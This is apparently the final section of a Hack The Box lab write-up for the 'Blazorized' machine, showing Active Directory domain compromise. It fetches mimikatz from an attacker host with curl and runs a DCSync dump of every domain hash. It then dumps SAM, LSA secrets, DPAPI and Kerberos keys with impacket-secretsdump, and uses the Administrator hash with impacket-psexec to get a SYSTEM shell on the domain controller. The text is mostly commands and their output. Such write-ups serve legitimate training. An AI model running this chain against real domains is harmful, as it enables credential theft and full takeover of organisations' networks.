DCSync Attack
As discovered previously from Bloodhound, the ssa_6010 account has DCSync privileges over the target domain.
Since the password of the account has not been uncovered, I cannot perform the DCSync attack remotely. However, mimikatz can be used locally
PS C:\tmp> curl http://10.10.14.226/mimikatz.exe -o C:\tmp\mimikatz.exeDelivery complete
PS C:\tmp> .\mimikatz.exe
.\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # Entered into the mimikatz shell
Hashdump
mimikatz # lsadump::dcsync /dc:dc1.blazorized.htb /domain:BLAZORIZED.HTB /all /csv
[DC] 'BLAZORIZED.HTB' will be the domain
[DC] 'dc1.blazorized.htb' will be the DC server
[DC] Exporting domain 'BLAZORIZED.HTB'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1109 NU_1056 abe496a00e60878932c084c9db511f94 66048
1110 NU_1057 59e98e58c973a5cb2b125a17ff91b6a8 66048
1111 NU_1058 6ac2dfc65463962ed19b653b409046ba 66048
1118 RSA_4811 4368391035803bf58273e1273692285b 66048
1120 RSA_4812 c66e4531c81de604e3531018fdad81cb 66048
1121 RSA_4813 2c84dfeb21e075dc5fc2c56447bdf9d6 66048
1122 RSA_4814 e7ddd56fabdb8fb1ebe6c43ff5fe815a 66048
1125 SSA_6011 be1ce1381c084dc4cda8159a665b3c59 66048
1126 SSA_6012 08db7bd0f2482f4e4cb0b1f6864f88e1 66048
1127 SSA_6013 ef37b4e655b62e664b6f9ae67133f2e6 66048
1128 LSA_3211 7c8fed15e80ed63db789ad740cda2f18 66048
1129 LSA_3212 72bab07816477b4aeffca4f709efbaa5 66048
1131 LSA_3213 e80b666e0ee68cd0a6516a92e75231cc 66048
502 krbtgt a001ebf25825cadb6b423a2d28378467 514
1002 DC1$ 4b4ed5dfaa22dc4e41c279c0c62b9ee2 532480
1117 NU_1055 63001e8b2d13ee358ad7d6de4590fed3 66048
500 Administrator f55ed1465179ba374ec1cad05b34a5f3 66048
1107 RSA_4810 381b793bde4dea233ae34bb1d9ce38f5 66048
1124 SSA_6010 798d0354e026fd168b91063f09184c9f 66048Dumping NT hashes
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ impacket-secretsdump BLAZORIZED.HTB/administrator@dc1.blazorized.htb -hashes :f55ed1465179ba374ec1cad05b34a5f3 -no-pass -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x5149446d0c0f1684ead5919b7267eccb
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bcdce18681c9164efd0e14607497edb4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
BLAZORIZED\DC1$:aes256-cts-hmac-sha1-96:264d43979aa337ff88a1889bbf92c11862c40aa8f3de87d0e8247674879333da
BLAZORIZED\DC1$:aes128-cts-hmac-sha1-96:4b37e41fce7c0b54556e738cab7e7023
BLAZORIZED\DC1$:des-cbc-md5:61a40e5e57b5194c
BLAZORIZED\DC1$:plain_password_hex:b00d3c772c7c6dc9295d60492f43bd30202af0827f09bb67d7e715d101ac94e2b18985380329c9a0b7e95fdad731af706a3825c37221ca17891905ce16d604268e405df549438b64e5cbdc99299e59320d17ba0a4d07cf740b6d5199e71d1e423b937eba2566654efb8b9394c80d984d9ac59b17ba5ac2c4e59f70154441453671fb1a9bd6fbcad5dea4e45d8fa3cd83d9a910ebc24b4ce504712b22f9721047ef47a8f7381ff9ea6405d98c9b8f5440b5a111e7eaff7d7220376affaf8ca82983650838e07f46cbd223916b1028a27fbc77d48f49e4adcdb8b1663042394188758ae6d1c05d930ebab45d76321379c6
BLAZORIZED\DC1$:aad3b435b51404eeaad3b435b51404ee:4b4ed5dfaa22dc4e41c279c0c62b9ee2:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdce3e201baf796d87b66a9ca837e97fcad2b495d
dpapi_userkey:0xed8a895f2eb40b316076673ec64d1e139f90cf03
[*] NL$KM
0000 A2 52 9D 31 0B B7 1C 75 45 D6 4B 76 41 2D D3 21 .R.1...uE.KvA-.!
0010 C6 5C DD 04 24 D3 07 FF CA 5C F4 E5 A0 38 94 14 .\..$....\...8..
0020 91 64 FA C7 91 D2 0E 02 7A D6 52 53 B4 F4 A9 6F .d......z.RS...o
0030 58 CA 76 00 DD 39 01 7D C5 F7 8F 4B AB 1E DC 63 X.v..9.}...K...c
NL$KM:a2529d310bb71c7545d64b76412dd321c65cdd0424d307ffca5cf4e5a03894149164fac791d20e027ad65253b4f4a96f58ca7600dd39017dc5f78f4bab1edc63
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f55ed1465179ba374ec1cad05b34a5f3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a001ebf25825cadb6b423a2d28378467:::
blazorized.htb\RSA_4810:1107:aad3b435b51404eeaad3b435b51404ee:381b793bde4dea233ae34bb1d9ce38f5:::
blazorized.htb\NU_1056:1109:aad3b435b51404eeaad3b435b51404ee:abe496a00e60878932c084c9db511f94:::
blazorized.htb\NU_1057:1110:aad3b435b51404eeaad3b435b51404ee:59e98e58c973a5cb2b125a17ff91b6a8:::
blazorized.htb\NU_1058:1111:aad3b435b51404eeaad3b435b51404ee:6ac2dfc65463962ed19b653b409046ba:::
blazorized.htb\NU_1055:1117:aad3b435b51404eeaad3b435b51404ee:63001e8b2d13ee358ad7d6de4590fed3:::
blazorized.htb\RSA_4811:1118:aad3b435b51404eeaad3b435b51404ee:4368391035803bf58273e1273692285b:::
blazorized.htb\RSA_4812:1120:aad3b435b51404eeaad3b435b51404ee:c66e4531c81de604e3531018fdad81cb:::
blazorized.htb\RSA_4813:1121:aad3b435b51404eeaad3b435b51404ee:2c84dfeb21e075dc5fc2c56447bdf9d6:::
blazorized.htb\RSA_4814:1122:aad3b435b51404eeaad3b435b51404ee:e7ddd56fabdb8fb1ebe6c43ff5fe815a:::
blazorized.htb\SSA_6010:1124:aad3b435b51404eeaad3b435b51404ee:798d0354e026fd168b91063f09184c9f:::
blazorized.htb\SSA_6011:1125:aad3b435b51404eeaad3b435b51404ee:be1ce1381c084dc4cda8159a665b3c59:::
blazorized.htb\SSA_6012:1126:aad3b435b51404eeaad3b435b51404ee:08db7bd0f2482f4e4cb0b1f6864f88e1:::
blazorized.htb\SSA_6013:1127:aad3b435b51404eeaad3b435b51404ee:ef37b4e655b62e664b6f9ae67133f2e6:::
blazorized.htb\LSA_3211:1128:aad3b435b51404eeaad3b435b51404ee:7c8fed15e80ed63db789ad740cda2f18:::
blazorized.htb\LSA_3212:1129:aad3b435b51404eeaad3b435b51404ee:72bab07816477b4aeffca4f709efbaa5:::
blazorized.htb\LSA_3213:1131:aad3b435b51404eeaad3b435b51404ee:e80b666e0ee68cd0a6516a92e75231cc:::
DC1$:1002:aad3b435b51404eeaad3b435b51404ee:4b4ed5dfaa22dc4e41c279c0c62b9ee2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
Administrator:aes128-cts-hmac-sha1-96:df4dbea7fcf2ef56722a6741439a9f81
Administrator:des-cbc-md5:310e2a0438583dce
krbtgt:aes256-cts-hmac-sha1-96:6fbd8e680330075f57dfef87611756c3b64a17f2da580f124f87c95ca23a99a3
krbtgt:aes128-cts-hmac-sha1-96:267c72742cbc75ee902b87931cd285c0
krbtgt:des-cbc-md5:ab296e8a580d467f
blazorized.htb\RSA_4810:aes256-cts-hmac-sha1-96:e48de8bb2599d654097a5970801f1e881d9be5686113a1311dece1307e22727d
blazorized.htb\RSA_4810:aes128-cts-hmac-sha1-96:d03656e41ca1f7a6f10cf4122b86a984
blazorized.htb\RSA_4810:des-cbc-md5:ab466b1f13683738
blazorized.htb\NU_1056:aes256-cts-hmac-sha1-96:99f5372eb03d11b68d4ec0563be747aa2738b731305ce16ac557ed95327140ea
blazorized.htb\NU_1056:aes128-cts-hmac-sha1-96:c5f2e39f662aa84bb943c7929e4c1b19
blazorized.htb\NU_1056:des-cbc-md5:5d64e34ac7108361
blazorized.htb\NU_1057:aes256-cts-hmac-sha1-96:99a21bf60af441d61072f12238ddd12c34128b242fff816f7cd310e9d5ec5767
blazorized.htb\NU_1057:aes128-cts-hmac-sha1-96:540db208fbcf6cf85395a69021a3def3
blazorized.htb\NU_1057:des-cbc-md5:2ac72c52b9d6d9b5
blazorized.htb\NU_1058:aes256-cts-hmac-sha1-96:4c3d34f68ca15ea1701dfe294adb2e12c003214070b80fff5a33b39444d94c3f
blazorized.htb\NU_1058:aes128-cts-hmac-sha1-96:8bc3df305384e00d92fd71c970227297
blazorized.htb\NU_1058:des-cbc-md5:f2e5a72cae94b0e5
blazorized.htb\NU_1055:aes256-cts-hmac-sha1-96:5d4785e965671cd529986da058f95501e9b4f6fcdb09ad438f20c4f83711f367
blazorized.htb\NU_1055:aes128-cts-hmac-sha1-96:0c9e3adbc13a0765c40787ffac5a39be
blazorized.htb\NU_1055:des-cbc-md5:df798fa47a105e79
blazorized.htb\RSA_4811:aes256-cts-hmac-sha1-96:58bb946b0cf46fd9f0244deb848be158ebeeb83e6f3b4be225af7525e4001ab9
blazorized.htb\RSA_4811:aes128-cts-hmac-sha1-96:48f8b244c63b1a86338cbcc0f165d3da
blazorized.htb\RSA_4811:des-cbc-md5:589bcbab52490761
blazorized.htb\RSA_4812:aes256-cts-hmac-sha1-96:e630866aeeb8ca1bdabf1addfd2babb5ee25c3600d0b9f97ce134c21987b3ca7
blazorized.htb\RSA_4812:aes128-cts-hmac-sha1-96:e198b36b581c86dd1ccd9c7aa80a44b9
blazorized.htb\RSA_4812:des-cbc-md5:e0cbad7adac1156e
blazorized.htb\RSA_4813:aes256-cts-hmac-sha1-96:c96e7947c1cfe0157869712a399fa476c951ca8047cfa769d57bb560914b554a
blazorized.htb\RSA_4813:aes128-cts-hmac-sha1-96:b4c4e402eea383df835d7907e83d7bb0
blazorized.htb\RSA_4813:des-cbc-md5:e6020416ef433d80
blazorized.htb\RSA_4814:aes256-cts-hmac-sha1-96:6ba18d60c93c9dfde4229a8d0a9387f991b8befd7593f819c2efa1f42e92e751
blazorized.htb\RSA_4814:aes128-cts-hmac-sha1-96:6ee9c98b2f3df72452c714e39280684e
blazorized.htb\RSA_4814:des-cbc-md5:8f4a154f83f4e352
blazorized.htb\SSA_6010:aes256-cts-hmac-sha1-96:ea97f88aebdcef5b51d2f2f31496eb35ca46c1e69a20fd9bb85a12af4fd5c6a5
blazorized.htb\SSA_6010:aes128-cts-hmac-sha1-96:bbd55eb8c2e43457e9046a496ce9c0b6
blazorized.htb\SSA_6010:des-cbc-md5:19e358c22925a702
blazorized.htb\SSA_6011:aes256-cts-hmac-sha1-96:5c4884b05b5c2047af79070e97e20298c231cb331860a08d2f4f76f7139f49a8
blazorized.htb\SSA_6011:aes128-cts-hmac-sha1-96:c326b48e27d68ceba0709d64d5252794
blazorized.htb\SSA_6011:des-cbc-md5:e3a25df48f6e5e08
blazorized.htb\SSA_6012:aes256-cts-hmac-sha1-96:127038633f50298a7fe71bef73986ffe194e52179a8cf225da2f30cc25a4a617
blazorized.htb\SSA_6012:aes128-cts-hmac-sha1-96:7376c0e7a15c83a8fd715bec1526d9cc
blazorized.htb\SSA_6012:des-cbc-md5:45f28a582c344007
blazorized.htb\SSA_6013:aes256-cts-hmac-sha1-96:6ae76f676b2842481de6bb5676373682d1a2981a7cf594ac583f0b1487b16fe7
blazorized.htb\SSA_6013:aes128-cts-hmac-sha1-96:1c94468ee6092aa5258a66bd943e1349
blazorized.htb\SSA_6013:des-cbc-md5:c8b902aeb9574c3b
blazorized.htb\LSA_3211:aes256-cts-hmac-sha1-96:faadbb1444366ca00b1999438b18a56c128769c780b698f329bafe8ed6bd3ce0
blazorized.htb\LSA_3211:aes128-cts-hmac-sha1-96:fffa5164d5c93572bda604a0582683e1
blazorized.htb\LSA_3211:des-cbc-md5:31c86d61e32526e3
blazorized.htb\LSA_3212:aes256-cts-hmac-sha1-96:a534868b73581c90cdfae87f57697c7cfd7aa182263a872ae102eacf5ee9fa25
blazorized.htb\LSA_3212:aes128-cts-hmac-sha1-96:5719fa6dc2c6c0bb0f988f88f780f1dd
blazorized.htb\LSA_3212:des-cbc-md5:6126e5bf67a7ef2a
blazorized.htb\LSA_3213:aes256-cts-hmac-sha1-96:db929c1d88fd1b6a780df0c51a1829248971dcf4392fa4dd79e5db5b59a90196
blazorized.htb\LSA_3213:aes128-cts-hmac-sha1-96:777123969a90bd927496d180e9f1a30c
blazorized.htb\LSA_3213:des-cbc-md5:3d620d07da5e57d0
DC1$:aes256-cts-hmac-sha1-96:264d43979aa337ff88a1889bbf92c11862c40aa8f3de87d0e8247674879333da
DC1$:aes128-cts-hmac-sha1-96:4b37e41fce7c0b54556e738cab7e7023
DC1$:des-cbc-md5:80d04c8540b9ef54
[*] Cleaning up...
[*] Stopping service RemoteRegistryDomain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ impacket-psexec BLAZORIZED.HTB/administrator@dc1.blazorized.htb -hashes :f55ed1465179ba374ec1cad05b34a5f3 -no-pass -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on dc1.blazorized.htb.....
[*] Found writable share ADMIN$
[*] Uploading file cofCQWSp.exe
[*] Opening SVCManager on dc1.blazorized.htb.....
[*] Creating service AxIH on dc1.blazorized.htb.....
[*] Starting service AxIH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.5933]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC1
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.22
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2System Level Compromise